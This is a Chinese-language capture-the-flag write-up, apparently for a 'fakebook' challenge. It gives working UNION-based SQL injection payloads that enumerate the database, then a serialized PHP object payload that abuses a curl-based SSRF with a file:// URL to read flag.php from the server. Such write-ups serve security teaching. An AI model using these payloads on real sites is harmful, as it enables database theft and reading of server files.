进入页面注册用户登录用户
在view.php中发下存在注入点。
查询字段数,表名,字段名等等。
查询数据库
no=-1++union++select++1,group_concat(schema_name),3,4++from++information_schema.schemata--+
查询表名
/view.php?no=-1++union++select++1,group_concat(table_name),3,4++from++information_schema.tables++where++table_schema='fakebook'--
查字段
/view.php?no=-1++union++select++1,group_concat(column_name),3,4++from++information_schema.columns++where++table_name='users'--+
这里存在data的序列化文件
O:8:"UserInfo":3:{s:4:"name";s:7:"zyg1999";s:3:"age";i:15;s:4:"blog";s:11:"www.123.top";}
我们需要在这里去查询flag的位置
查看robots.txt 发现备份文件/user.php.bak,下载下来
php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $this->blog = $blog; } function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($httpCode == 404) { return 404; } curl_close($ch); return $output; } public function getBlogContents () { return $this->get($this->blog); } public function isValidBlog () { $blog = $this->blog; return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog); } }
这里的考点是序列化结合ssrf
payload:?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";i:1;s:3:"age";i:2;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
拿去解码得到flag